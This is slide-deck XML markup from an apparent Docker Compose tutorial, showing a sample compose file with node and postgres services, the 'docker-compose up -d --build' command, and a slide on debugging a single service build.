          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  yourservicename1:</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    container_name: vuecont9</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    build: .</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    ports:</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2150">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      -'6000:5173'</a:t>
            </a:r>
            <a:endParaRPr sz="2150">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258350" y="14524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120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to start a service</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1729" name="Google Shape;1729;p279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2452325"/>
            <a:ext cx="8520600" cy="9681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b="1" lang="en" sz="3850">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>docker-compose up -d --build</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4700">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>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280"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="76200"/>
            <a:ext cx="4572000" cy="4958100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>'3.9'</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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569CD6"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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service1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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container_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>node_cont</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="B5CEA8"/>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depends_on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>'5000:5000'</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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volumes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.:/app</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/app/node_modules</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>'postgres:latest'</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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container_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>db_cont</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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ports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>'5432:5432'</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>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environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>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POSTGRES_PASSWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>'mysecretpassword'</a:t>
            </a:r>
            <a:endParaRPr sz="1150">
              <a:solidFill>
                <a:srgbClr val="CE9178"/>
              </a:solidFill>
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="136666"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>POSTGRES_USER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>'oklabs'</a:t>
            </a:r>
            <a:endParaRPr sz="300">
              <a:highlight>
                <a:schemeClr val="lt1"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>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281"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274550" y="2872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Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Debugging the Docker Build:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1740" name="Google Shape;1740;p281"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="859900"/>
            <a:ext cx="8520600" cy="3844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000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>You can run the build step for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>strapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> service separately to get more detailed information about the issue. Instead of using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>docker-compose up -d --build</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, you can try running just the build for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1750">
                <a:solidFill>
                  <a:srgbClr val="188038"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>strapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> service:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="3050">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose build &lt;serviceName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker-compose build strapi</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
